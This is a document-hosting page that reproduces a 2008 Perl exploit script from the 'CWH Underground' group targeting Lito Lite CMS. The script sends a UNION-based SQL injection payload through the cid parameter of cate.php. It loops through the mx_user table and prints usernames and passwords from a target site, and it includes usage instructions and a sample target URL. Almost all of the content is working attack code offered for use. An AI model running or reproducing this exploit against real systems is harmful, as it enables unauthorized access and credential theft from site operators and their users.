Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

Lito Lite CMS cate.php cid Remote SQL Injection Exploit

VIEWS: 29 PAGES: 2

									                             Lito Lite CMS cate.php cid Remote SQL Injection Exploit               Page 1/2
  1    #!/usr/bin/perl −w
  2    #===========================================================
  3    # Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
  4    #===========================================================
  5    #
  6    # ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
  7    # | |||||||||     ‘−−−−−−−−’     |          O    .. CWH Underground Hacking Team ..
  8    # ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
  9    #    ‘\_,−−−−−−−, _________________________|
  10   #       / XXXXXX /‘|      /
  11   #     / XXXXXX / ‘\     /
  12   #    / XXXXXX /\______(
  13   #   / XXXXXX /
  14   # / XXXXXX /
  15   # (________(
  16   # ‘−−−−−−’
  17   #
  18   #AUTHOR : CWH Underground
  19   #DATE : 29 November 2008
  20   #SITE : cwh.citec.us
  21   #
  22   #
  23   #####################################################
  24   #APPLICATION : Lito Lite CMS
  25   #DOWNLOAD     : http://www.lovedesigner.net/files/download/lito_lite.zip
  26   ######################################################
  27   #
  28   #Note: magic_quotes_gpc = off
  29   #
  30   #######################################################################################
  31   #Greetz       : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
  32   #Special Thx : asylu3, str0ke, citec.us, milw0rm.com
  33   #######################################################################################
  34
  35
  36   use LWP::UserAgent;
  37   use HTTP::Request;
  38
  39   if ($#ARGV+1 != 2)
  40   {
  41      print "\n==============================================\n";
  42      print " Lito Lite Remote SQL Injection Exploit \n";
  43      print "                           \n";
  44      print "        Discovered By CWH Underground     \n";
  45      print "==============================================\n";
  46      print "                           \n";
  47      print " ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−, \n";
  48      print " | ||||||||| ‘−−−−−−−−’ |     O                   \n";
  49      print " ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−| \n";
  50      print " ‘\_,−−−−−−−, _________________________| \n";
  51      print "      / XXXXXX /‘| /              \n";
  52      print " / XXXXXX / ‘\ /                  \n";
CWH Underground                                                                                    11/29/2008
                               Lito Lite CMS cate.php cid Remote SQL Injection Exploit                                                 Page 2/2
  53       print " / XXXXXX /\______(                    \n";
  54       print " / XXXXXX /                         \n";
  55       print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
  56       print " (________(                      \n";
  57       print " ‘−−−−−−’                        \n";
  58       print "                            \n";
  59       print "Usage : ./xpl.pl <Target> <Data Limit>\n";
  60       print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
  61       exit();
  62   }
  63
  64   $target = ($ARGV[0] =~ /^http:\/\//) ?                $ARGV[0]:       ’http://’ . $ARGV[0];
  65   $number = $ARGV[1];
  66
  67   print   "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
  68   print   "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
  69   print   "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
  70   print   "\n[+]Dump Username and Password\n";
  71
  72   for ($start=0;$start<$number;$start++) {
  73
  74   $xpl = LWP::UserAgent−>new() or die "Could not initialize browser\n";
  75   $req = HTTP::Request−>new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x
       3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."−−+and+1=1")or die "Failed to Connect, Try again!\n";
  76   $res = $xpl−>request($req);
  77   $info = $res−>content;
  78   $count=$start+1;
  79
  80   if ($info =~ /:::(.+):::/)
  81   {
  82   $dump=$1;
  83   ($username,$password)= split(’::’,$dump);
  84   printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
  85   }
  86   else {
  87           print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
  88           exit;
  89   }
  90   }
  91
  92   # milw0rm.com [2008−11−29]




CWH Underground                                                                                                                        11/29/2008

								
To top